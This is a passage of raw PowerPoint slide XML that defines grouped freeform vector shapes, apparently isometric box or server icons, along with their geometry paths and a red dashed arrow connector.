                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBE2B9BE-D8D3-456E-A6B2-9F1D35F5764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1652" y="6301"/>
                  <a:ext cx="902" cy="709"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 902 w 902"/>
                    <a:gd name="T1" fmla="*/ 241 h 709"/>
                    <a:gd name="T2" fmla="*/ 900 w 902"/>
                    <a:gd name="T3" fmla="*/ 709 h 709"/>
                    <a:gd name="T4" fmla="*/ 0 w 902"/>
                    <a:gd name="T5" fmla="*/ 468 h 709"/>
                    <a:gd name="T6" fmla="*/ 0 w 902"/>
                    <a:gd name="T7" fmla="*/ 0 h 709"/>
                    <a:gd name="T8" fmla="*/ 902 w 902"/>
                    <a:gd name="T9" fmla="*/ 241 h 7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02" h="709">
                      <a:moveTo>
                        <a:pt x="902" y="241"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="900" y="709"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="468"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="902" y="241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72" name="Freeform 940">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D7DBC15-8C2E-4B14-B9C9-01289804E34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752" y="6422"/>
                  <a:ext cx="454" cy="590"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 257 w 454"/>
                    <a:gd name="T1" fmla="*/ 51 h 590"/>
                    <a:gd name="T2" fmla="*/ 454 w 454"/>
                    <a:gd name="T3" fmla="*/ 0 h 590"/>
                    <a:gd name="T4" fmla="*/ 454 w 454"/>
                    <a:gd name="T5" fmla="*/ 196 h 590"/>
                    <a:gd name="T6" fmla="*/ 454 w 454"/>
                    <a:gd name="T7" fmla="*/ 467 h 590"/>
                    <a:gd name="T8" fmla="*/ 0 w 454"/>
                    <a:gd name="T9" fmla="*/ 590 h 590"/>
                    <a:gd name="T10" fmla="*/ 2 w 454"/>
                    <a:gd name="T11" fmla="*/ 120 h 590"/>
                    <a:gd name="T12" fmla="*/ 257 w 454"/>
                    <a:gd name="T13" fmla="*/ 51 h 5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54" h="590">
                      <a:moveTo>
                        <a:pt x="257" y="51"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="454" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="454" y="196"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="454" y="467"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="590"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="51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54" name="Group 1137">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00812637-5B88-4E3D-B418-D5FD608D4D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26" y="2217"/>
                <a:ext cx="124" cy="96"/>
                <a:chOff x="2155" y="1811"/>
                <a:chExt cx="675" cy="523"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="2155" name="Freeform 1138">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2913FE1-6ACD-450A-AD5B-EA3B82ABE08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90" y="1818"/>
                  <a:ext cx="314" cy="433"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 4460"/>
                    <a:gd name="T1" fmla="*/ 0 h 6160"/>
                    <a:gd name="T2" fmla="*/ 0 w 4460"/>
                    <a:gd name="T3" fmla="*/ 4972 h 6160"/>
                    <a:gd name="T4" fmla="*/ 4460 w 4460"/>
                    <a:gd name="T5" fmla="*/ 6160 h 6160"/>
                    <a:gd name="T6" fmla="*/ 4460 w 4460"/>
                    <a:gd name="T7" fmla="*/ 1188 h 6160"/>
                    <a:gd name="T8" fmla="*/ 0 w 4460"/>
                    <a:gd name="T9" fmla="*/ 0 h 6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60" h="6160">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="4972"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4460" y="6160"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4460" y="11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56" name="Freeform 1139">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E57D4A6E-A028-4846-94C8-F9FB3EF380D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3" y="1850"/>
                  <a:ext cx="268" cy="332"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 3803"/>
                    <a:gd name="T1" fmla="*/ 0 h 4725"/>
                    <a:gd name="T2" fmla="*/ 0 w 3803"/>
                    <a:gd name="T3" fmla="*/ 3711 h 4725"/>
                    <a:gd name="T4" fmla="*/ 3803 w 3803"/>
                    <a:gd name="T5" fmla="*/ 4725 h 4725"/>
                    <a:gd name="T6" fmla="*/ 3803 w 3803"/>
                    <a:gd name="T7" fmla="*/ 1014 h 4725"/>
                    <a:gd name="T8" fmla="*/ 0 w 3803"/>
                    <a:gd name="T9" fmla="*/ 0 h 47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03" h="4725">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="3711"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3803" y="4725"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3803" y="10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4074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57" name="Freeform 1140">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1780D98F-9B9D-42DC-BFCB-EA33A418C01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90" y="1811"/>
                  <a:ext cx="340" cy="90"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 4831 w 4831"/>
                    <a:gd name="T1" fmla="*/ 1189 h 1288"/>
                    <a:gd name="T2" fmla="*/ 4460 w 4831"/>
                    <a:gd name="T3" fmla="*/ 1288 h 1288"/>
                    <a:gd name="T4" fmla="*/ 0 w 4831"/>
                    <a:gd name="T5" fmla="*/ 100 h 1288"/>
                    <a:gd name="T6" fmla="*/ 368 w 4831"/>
                    <a:gd name="T7" fmla="*/ 0 h 1288"/>
                    <a:gd name="T8" fmla="*/ 4831 w 4831"/>
                    <a:gd name="T9" fmla="*/ 1189 h 1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31" h="1288">
                      <a:moveTo>
                        <a:pt x="4831" y="1189"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4460" y="1288"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="100"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="368" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4831" y="11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58" name="Freeform 1141">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EFC1B3F-F88E-4B81-ABDF-B5C3AD60413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155" y="2127"/>
                  <a:ext cx="675" cy="181"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 9603"/>
                    <a:gd name="T1" fmla="*/ 1287 h 2577"/>
                    <a:gd name="T2" fmla="*/ 4802 w 9603"/>
                    <a:gd name="T3" fmla="*/ 0 h 2577"/>
                    <a:gd name="T4" fmla="*/ 9603 w 9603"/>
                    <a:gd name="T5" fmla="*/ 1287 h 2577"/>
                    <a:gd name="T6" fmla="*/ 4802 w 9603"/>
                    <a:gd name="T7" fmla="*/ 2577 h 2577"/>
                    <a:gd name="T8" fmla="*/ 0 w 9603"/>
                    <a:gd name="T9" fmla="*/ 1287 h 25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603" h="2577">
                      <a:moveTo>
                        <a:pt x="0" y="1287"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4802" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9603" y="1287"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4802" y="2577"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="12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59" name="Freeform 1142">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DA9A4F-7324-4E38-AAC4-24C155429E4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93" y="2218"/>
                  <a:ext cx="337" cy="116"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 4801"/>
                    <a:gd name="T1" fmla="*/ 1290 h 1656"/>
                    <a:gd name="T2" fmla="*/ 0 w 4801"/>
                    <a:gd name="T3" fmla="*/ 1656 h 1656"/>
                    <a:gd name="T4" fmla="*/ 4801 w 4801"/>
                    <a:gd name="T5" fmla="*/ 369 h 1656"/>
                    <a:gd name="T6" fmla="*/ 4801 w 4801"/>
                    <a:gd name="T7" fmla="*/ 0 h 1656"/>
                    <a:gd name="T8" fmla="*/ 0 w 4801"/>
                    <a:gd name="T9" fmla="*/ 1290 h 16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01" h="1656">
                      <a:moveTo>
                        <a:pt x="0" y="1290"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="1656"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4801" y="369"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4801" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="129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60" name="Freeform 1143">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06D0528E-FB17-4284-A6E9-BFB11EB0B93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155" y="2218"/>
                  <a:ext cx="338" cy="116"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 4802 w 4802"/>
                    <a:gd name="T1" fmla="*/ 1656 h 1656"/>
                    <a:gd name="T2" fmla="*/ 0 w 4802"/>
                    <a:gd name="T3" fmla="*/ 369 h 1656"/>
                    <a:gd name="T4" fmla="*/ 0 w 4802"/>
                    <a:gd name="T5" fmla="*/ 0 h 1656"/>
                    <a:gd name="T6" fmla="*/ 4802 w 4802"/>
                    <a:gd name="T7" fmla="*/ 1290 h 1656"/>
                    <a:gd name="T8" fmla="*/ 4802 w 4802"/>
                    <a:gd name="T9" fmla="*/ 1656 h 16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02" h="1656">
                      <a:moveTo>
                        <a:pt x="4802" y="1656"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="369"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4802" y="1290"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4802" y="165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61" name="Freeform 1144">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4029316-9C85-432C-8B77-C9DF56F94AA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51" y="2157"/>
                  <a:ext cx="457" cy="122"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 6492"/>
                    <a:gd name="T1" fmla="*/ 654 h 1743"/>
                    <a:gd name="T2" fmla="*/ 4061 w 6492"/>
                    <a:gd name="T3" fmla="*/ 1743 h 1743"/>
                    <a:gd name="T4" fmla="*/ 6492 w 6492"/>
                    <a:gd name="T5" fmla="*/ 1091 h 1743"/>
                    <a:gd name="T6" fmla="*/ 2431 w 6492"/>
                    <a:gd name="T7" fmla="*/ 0 h 1743"/>
                    <a:gd name="T8" fmla="*/ 0 w 6492"/>
                    <a:gd name="T9" fmla="*/ 654 h 1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92" h="1743">
                      <a:moveTo>
                        <a:pt x="0" y="654"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4061" y="1743"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6492" y="1091"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2431" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="654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62" name="Freeform 1145">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C30782B9-8673-47E8-AD37-C9B164884DF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04" y="1894"/>
                  <a:ext cx="26" cy="357"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 371"/>
                    <a:gd name="T1" fmla="*/ 5071 h 5071"/>
                    <a:gd name="T2" fmla="*/ 371 w 371"/>
                    <a:gd name="T3" fmla="*/ 4972 h 5071"/>
                    <a:gd name="T4" fmla="*/ 371 w 371"/>
                    <a:gd name="T5" fmla="*/ 0 h 5071"/>
                    <a:gd name="T6" fmla="*/ 0 w 371"/>
                    <a:gd name="T7" fmla="*/ 99 h 5071"/>
                    <a:gd name="T8" fmla="*/ 0 w 371"/>
                    <a:gd name="T9" fmla="*/ 5071 h 50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1" h="5071">
                      <a:moveTo>
                        <a:pt x="0" y="5071"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="371" y="4972"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="371" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="99"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="507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10" name="Group 1146">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFA0B9C8-7E86-451F-BDD9-16CC0A910A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6000" y="3628476"/>
              <a:ext cx="210694" cy="383296"/>
              <a:chOff x="-5369" y="4478"/>
              <a:chExt cx="905" cy="1649"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2142" name="Freeform 1147">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{416E0214-6203-42B7-85A8-2944BC6F9EF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5369" y="4478"/>
                <a:ext cx="905" cy="243"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 905"/>
                  <a:gd name="T1" fmla="*/ 123 h 243"/>
                  <a:gd name="T2" fmla="*/ 454 w 905"/>
                  <a:gd name="T3" fmla="*/ 0 h 243"/>
                  <a:gd name="T4" fmla="*/ 905 w 905"/>
                  <a:gd name="T5" fmla="*/ 123 h 243"/>
                  <a:gd name="T6" fmla="*/ 454 w 905"/>
                  <a:gd name="T7" fmla="*/ 243 h 243"/>
                  <a:gd name="T8" fmla="*/ 0 w 905"/>
                  <a:gd name="T9" fmla="*/ 12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05" h="243">
                    <a:moveTo>
                      <a:pt x="0" y="123"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="454" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="905" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="243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43" name="Freeform 1148">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88C20055-FED5-4893-942F-680E3D617C2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5369" y="4601"/>
                <a:ext cx="454" cy="1526"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 454"/>
                  <a:gd name="T1" fmla="*/ 0 h 1526"/>
                  <a:gd name="T2" fmla="*/ 0 w 454"/>
                  <a:gd name="T3" fmla="*/ 1405 h 1526"/>
                  <a:gd name="T4" fmla="*/ 454 w 454"/>
                  <a:gd name="T5" fmla="*/ 1526 h 1526"/>
                  <a:gd name="T6" fmla="*/ 454 w 454"/>
                  <a:gd name="T7" fmla="*/ 120 h 1526"/>
                  <a:gd name="T8" fmla="*/ 0 w 454"/>
                  <a:gd name="T9" fmla="*/ 0 h 1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4" h="1526">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="1526"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454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44" name="Freeform 1149">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{897DCC33-A984-42B9-897D-06F09355E93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4915" y="4660"/>
                <a:ext cx="224" cy="1467"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 224"/>
                  <a:gd name="T1" fmla="*/ 61 h 1467"/>
                  <a:gd name="T2" fmla="*/ 0 w 224"/>
                  <a:gd name="T3" fmla="*/ 1467 h 1467"/>
                  <a:gd name="T4" fmla="*/ 224 w 224"/>
                  <a:gd name="T5" fmla="*/ 1405 h 1467"/>
                  <a:gd name="T6" fmla="*/ 224 w 224"/>
                  <a:gd name="T7" fmla="*/ 0 h 1467"/>
                  <a:gd name="T8" fmla="*/ 0 w 224"/>
                  <a:gd name="T9" fmla="*/ 61 h 1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4" h="1467">
                    <a:moveTo>
                      <a:pt x="0" y="61"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="1405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="0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45" name="Freeform 1150">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AA469E1-7E3A-4DBA-9DDA-F8825A4097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4877" y="4716"/>
                <a:ext cx="148" cy="959"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 148"/>
                  <a:gd name="T1" fmla="*/ 40 h 959"/>
                  <a:gd name="T2" fmla="*/ 0 w 148"/>
                  <a:gd name="T3" fmla="*/ 959 h 959"/>
                  <a:gd name="T4" fmla="*/ 148 w 148"/>
                  <a:gd name="T5" fmla="*/ 919 h 959"/>
                  <a:gd name="T6" fmla="*/ 148 w 148"/>
                  <a:gd name="T7" fmla="*/ 0 h 959"/>
                  <a:gd name="T8" fmla="*/ 0 w 148"/>
                  <a:gd name="T9" fmla="*/ 40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8" h="959">
                    <a:moveTo>
                      <a:pt x="0" y="40"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="959"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="919"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="0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9DC2EB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46" name="Freeform 1151">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E043086A-4792-4D17-97FC-240F8042F63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4691" y="4601"/>
                <a:ext cx="227" cy="1464"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 227 w 227"/>
                  <a:gd name="T1" fmla="*/ 0 h 1464"/>
                  <a:gd name="T2" fmla="*/ 0 w 227"/>
                  <a:gd name="T3" fmla="*/ 59 h 1464"/>
                  <a:gd name="T4" fmla="*/ 0 w 227"/>
                  <a:gd name="T5" fmla="*/ 1464 h 1464"/>
                  <a:gd name="T6" fmla="*/ 227 w 227"/>
                  <a:gd name="T7" fmla="*/ 1405 h 1464"/>
                  <a:gd name="T8" fmla="*/ 227 w 227"/>
                  <a:gd name="T9" fmla="*/ 0 h 1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7" h="1464">
                    <a:moveTo>
                      <a:pt x="227" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1464"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="1405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="0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47" name="Freeform 1152">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA3537B1-1996-4D80-BC3F-0C1526AA22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4648" y="4664"/>
                <a:ext cx="149" cy="959"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 149"/>
                  <a:gd name="T1" fmla="*/ 40 h 959"/>
                  <a:gd name="T2" fmla="*/ 0 w 149"/>
                  <a:gd name="T3" fmla="*/ 959 h 959"/>
                  <a:gd name="T4" fmla="*/ 149 w 149"/>
                  <a:gd name="T5" fmla="*/ 922 h 959"/>
                  <a:gd name="T6" fmla="*/ 149 w 149"/>
                  <a:gd name="T7" fmla="*/ 0 h 959"/>
                  <a:gd name="T8" fmla="*/ 0 w 149"/>
                  <a:gd name="T9" fmla="*/ 40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9" h="959">
                    <a:moveTo>
                      <a:pt x="0" y="40"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="959"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="922"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="0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9DC2EB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48" name="Freeform 1153">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D06099C-38C7-4C2C-A691-15FBC6AB4AE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4665" y="5156"/>
                <a:ext cx="36" cy="151"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 15"/>
                  <a:gd name="T1" fmla="*/ 0 h 64"/>
                  <a:gd name="T2" fmla="*/ 0 w 15"/>
                  <a:gd name="T3" fmla="*/ 0 h 64"/>
                  <a:gd name="T4" fmla="*/ 15 w 15"/>
                  <a:gd name="T5" fmla="*/ 16 h 64"/>
                  <a:gd name="T6" fmla="*/ 15 w 15"/>
                  <a:gd name="T7" fmla="*/ 49 h 64"/>
                  <a:gd name="T8" fmla="*/ 0 w 15"/>
                  <a:gd name="T9" fmla="*/ 64 h 64"/>
                  <a:gd name="T10" fmla="*/ 0 w 15"/>
                  <a:gd name="T1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6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9" y="0"/>
                      <a:pt x="15" y="7"/>
                      <a:pt x="15" y="16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58"/>
                      <a:pt x="9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49" name="Freeform 1154">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA2AA841-A5EF-44D7-8BA6-BE515D60CE7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4665" y="5156"/>
                <a:ext cx="36" cy="151"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 15"/>
                  <a:gd name="T1" fmla="*/ 0 h 64"/>
                  <a:gd name="T2" fmla="*/ 0 w 15"/>
                  <a:gd name="T3" fmla="*/ 0 h 64"/>
                  <a:gd name="T4" fmla="*/ 15 w 15"/>
                  <a:gd name="T5" fmla="*/ 16 h 64"/>
                  <a:gd name="T6" fmla="*/ 15 w 15"/>
                  <a:gd name="T7" fmla="*/ 49 h 64"/>
                  <a:gd name="T8" fmla="*/ 0 w 15"/>
                  <a:gd name="T9" fmla="*/ 64 h 64"/>
                  <a:gd name="T10" fmla="*/ 0 w 15"/>
                  <a:gd name="T1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6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9" y="0"/>
                      <a:pt x="15" y="7"/>
                      <a:pt x="15" y="16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58"/>
                      <a:pt x="9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50" name="Freeform 1155">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{494BE86F-A70E-4D61-87B7-0BE304F051E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4707" y="5167"/>
                <a:ext cx="35" cy="152"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 15"/>
                  <a:gd name="T1" fmla="*/ 0 h 64"/>
                  <a:gd name="T2" fmla="*/ 0 w 15"/>
                  <a:gd name="T3" fmla="*/ 0 h 64"/>
                  <a:gd name="T4" fmla="*/ 15 w 15"/>
                  <a:gd name="T5" fmla="*/ 15 h 64"/>
                  <a:gd name="T6" fmla="*/ 15 w 15"/>
                  <a:gd name="T7" fmla="*/ 49 h 64"/>
                  <a:gd name="T8" fmla="*/ 0 w 15"/>
                  <a:gd name="T9" fmla="*/ 64 h 64"/>
                  <a:gd name="T10" fmla="*/ 0 w 15"/>
                  <a:gd name="T1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6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9" y="0"/>
                      <a:pt x="15" y="7"/>
                      <a:pt x="15" y="15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57"/>
                      <a:pt x="9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51" name="Freeform 1156">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7740D06-6D1F-4C9A-A655-50C408D2218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4707" y="5167"/>
                <a:ext cx="35" cy="152"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 15"/>
                  <a:gd name="T1" fmla="*/ 0 h 64"/>
                  <a:gd name="T2" fmla="*/ 0 w 15"/>
                  <a:gd name="T3" fmla="*/ 0 h 64"/>
                  <a:gd name="T4" fmla="*/ 15 w 15"/>
                  <a:gd name="T5" fmla="*/ 15 h 64"/>
                  <a:gd name="T6" fmla="*/ 15 w 15"/>
                  <a:gd name="T7" fmla="*/ 49 h 64"/>
                  <a:gd name="T8" fmla="*/ 0 w 15"/>
                  <a:gd name="T9" fmla="*/ 64 h 64"/>
                  <a:gd name="T10" fmla="*/ 0 w 15"/>
                  <a:gd name="T1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6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9" y="0"/>
                      <a:pt x="15" y="7"/>
                      <a:pt x="15" y="15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57"/>
                      <a:pt x="9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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="1711" name="Straight Arrow Connector 1710">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96D20823-46A0-40AD-BDFA-839EF58C8381}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="4883152" y="4087954"/>
              <a:ext cx="376865" cy="92847"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:prstDash val="sysDash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12" name="Group 1711">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DCA1DB4-5588-46A6-9F88-B708AD8A3B43}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5548168" y="3448548"/>
              <a:ext cx="826898" cy="618217"/>
              <a:chOff x="3524250" y="3635375"/>
              <a:chExt cx="1006475" cy="752475"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="2098" name="Group 1359">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD928820-F1F9-4259-AAE3-14C6F1DD42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4075113" y="3635375"/>
                <a:ext cx="455612" cy="436563"/>
                <a:chOff x="733" y="778"/>
